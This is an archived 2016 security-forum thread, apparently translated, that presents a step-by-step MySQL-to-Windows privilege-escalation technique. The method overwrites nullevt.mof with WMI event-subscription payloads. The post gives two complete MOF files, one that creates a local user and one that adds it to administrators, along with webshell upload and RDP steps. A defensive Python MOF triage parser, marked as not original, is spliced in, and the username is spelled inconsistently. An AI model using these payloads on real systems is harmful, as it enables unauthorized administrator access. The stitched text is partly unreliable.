
Silic Group Forum Archive - Silic Security

Views: 5339 | Replies: 123

[Original] [MySQL privilege escalation] A detailed explanation of MySQL privilege escalation via MOF extension files

Tony The user has been deleted
Posted 2016-2-23 14:53:06
[Preface] Today 拿破飞机 added me as a friend and said my MOF privilege-escalation idea was good but not detailed enough, so here is a detailed write-up of the MOF privilege-escalation method.

[Principle] nullevt.mof in the c:/windows/system32/wbem/mof/ directory is executed once every minute at a specific second (this is controlled by "And TargetInstance.Second = 5"; entering 5 here means it runs at the fifth second of every minute. I will share the MOF file in a moment.) So if a cmd command is added to nullevt.mof, that command will be executed automatically.

[Prerequisite] You have the MySQL root password.
I am demonstrating this in an environment I set up locally.
First upload a webshell yourself.
Then upload the MOF we prepared in advance, which contains the add-user command, to the server.
==================MOF add-user code==================

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user adminatony adminatony /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
If the MOF is executed, it will add a user called admintony for us.
Upload it.
OK. Before replacing nullevt.mof in the c:/windows/system32/wbem/mof/ directory, let's first check whether the system already has an admintony user, as follows:
Next we use a SQL command to move the uploaded MOF into the c:/windows/system32/wbem/mof/ directory, replacing nullevt.mof.
Replaced. Wait a moment and see whether the admintony user has been added.
Done, the user has been added, but admintony is not yet in the administrators group, so we upload another MOF to add it to the administrators group.

==================MOF add-to-administrators-group code=================
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe localgroup administrators admintony /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};

Then move addadmingroup.mof to c:/windows/system32/wbem/mof/nullevt.mof.
Wait a moment, then connect over 3389.
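As an added example (not part of the original post), the triage a defender would run on any unexpected .mof found in the wbem\mof directory: a small Python parser for the flat instance/property MOF shape used above that reports which consumer would execute code, what it would run, and which WQL filter fires it. The embedded sample is adapted from the post's add-user MOF (reindented); handling only this flat subset of MOF, with no nested instances or arrays, is an assumption of this script.

```python
import re
# Constructed sample, adapted from the post's add-user MOF (reindented, same content).
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
    EventNamespace = "Root\\Cimv2";  Name = "filtP2";  QueryLanguage = "WQL";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5";
};
instance of ActiveScriptEventConsumer as $Consumer {
    Name = "consPCSV2";  ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user adminatony adminatony /add\")";
};
instance of __FilterToConsumerBinding { Consumer = $Consumer;  Filter = $EventFilter; };
'''

# Flat MOF subset used above (assumption: no nested instances or arrays).
BLOCK = re.compile(r'instance of (\w+)(?:\s+as\s+\$(\w+))?\s*\{(.*?)\};', re.S)
PROP = re.compile(r'(\w+)\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+|\$?\w+)\s*;', re.S)
STR = re.compile(r'"((?:[^"\\]|\\.)*)"')
CODE_PROPS = {'ActiveScriptEventConsumer': 'ScriptText',        # consumer classes that execute
              'CommandLineEventConsumer': 'CommandLineTemplate'}  # supplied text, and where it lives

def unescape(s):  # resolve MOF string escapes: \" \\ \n \t
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m[1], m[1]), s)

def parse_mof(text):
    """Return [(class, alias, {property: value})]; adjacent string literals are concatenated."""
    out = []
    for cls, alias, body in BLOCK.findall(text):
        props = {}
        for key, raw in PROP.findall(body):
            parts = STR.findall(raw)
            props[key] = unescape(''.join(parts)) if parts else raw.strip().lstrip('$')
        out.append((cls, alias, props))
    return out

def triage(text):
    """List each code-running consumer that a binding activates, with its WQL trigger."""
    inst = parse_mof(text)
    by_alias = {a: (c, p) for c, a, p in inst if a}
    findings = []
    for cls, _, p in inst:
        if cls != '__FilterToConsumerBinding':
            continue
        ccls, cp = by_alias.get(p.get('Consumer'), (None, {}))
        _, fp = by_alias.get(p.get('Filter'), (None, {}))
        if ccls in CODE_PROPS:  # an unbound consumer never fires; a filter alone runs nothing
            findings.append({'consumer': cp.get('Name'), 'class': ccls,
                             'payload': cp.get(CODE_PROPS[ccls]), 'trigger': fp.get('Query')})
    return findings
```

On a live host the same three classes can be listed from the root\subscription namespace with Get-WmiObject to compare against what the file would register.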



harkie The user has been deleted
Posted 2016-2-23 17:21:16
This post was last edited by harkie on 2016-2-23 17:24

Add me as a friend
suy The user has been deleted
Posted 2016-2-23 17:33:22
Let's see how wild the OP's technique is
枫叶 The user has been deleted
Posted 2016-2-23 18:01:31
What's going on with you two?
Moriarty The user has been deleted
Posted 2016-2-23 18:05:18
Ruthless
刺刀 The user has been deleted
Posted 2016-2-23 18:31:32
Replying is a virtue
annabelle The user has been deleted
Posted 2016-2-23 18:34:26
接地气 The user has been deleted
Posted 2016-2-23 19:11:28
Here to show support.
jiangsir The user has been deleted
Posted 2016-2-23 19:47:22
Just watching........
ziii The user has been deleted
Posted 2016-2-23 20:10:47
Master 飞机
JJ-Fly The user has been deleted
Posted 2016-2-23 20:14:50
Taking a look, thanks
qq87956943 The user has been deleted
Posted 2016-2-23 21:05:05
Came in to learn the technique
wangbadang The user has been deleted
Posted 2016-2-23 21:34:23
Thanks, I'll learn from this
Tony The user has been deleted
Author | Posted 2016-2-23 21:39:00
枫叶 posted on 2016-2-23 18:01
What's going on with you two?

Just moving the article over here
Tony The user has been deleted
Author | Posted 2016-2-23 21:39:41

Thanks, senior. I didn't write it one floor at a time; I don't have as many 飞币 (forum coins) as you.
Dream° The user has been deleted
Posted 2016-2-23 23:01:28
This one's pretty good
four The user has been deleted
Posted 2016-2-23 23:29:45
Taking a look, learning the technique
cherishu The user has been deleted
Posted 2016-2-24 08:41:24
Thanks for sharing
Scorpion The user has been deleted
Posted 2016-2-24 09:00:11
Open sesame, show the content
MaxAeon The user has been deleted
Posted 2016-2-24 11:44:04
Let's see what's inside

GMT+8, 2017-2-27 16:56

© 2001-2014 Silic Corp.
